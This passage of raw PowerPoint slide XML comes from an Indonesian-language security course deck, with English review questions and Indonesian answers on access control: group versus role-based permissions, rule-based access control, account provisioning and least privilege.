            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melayani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, PAM juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>layanan</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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18031606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1. What is the difference between security group- and role-based permissions management?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Security group-based:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keanggotaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Satu group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> punya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewarisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> group yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Role-based (RBAC):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencerminkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pekerjaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>HR staff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>IT admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> role </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pekerjaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keanggotaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> group.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Group-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kalau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Role-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar group.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. In a rule-based access control model, can a subject negotiate with the data owner for access privileges? Why or why not?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>No.</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dirty="0"/>
              <a:t>Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>rule-based access control (RBAC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall rules, time-of-day restrictions, IP address restrictions).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (user) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>negosiasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. What is the process of ensuring accounts are only created for valid users, only assigned the appropriate privileges, and that the account credentials are known only to the valid user?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Identity and Access Management (IAM) / Account provisioning process.</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dirty="0"/>
              <a:t>Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>Principle of least privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> inti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>identity proofing dan provisioning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. What is the policy that states users should be allocated the minimum sufficient permissions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
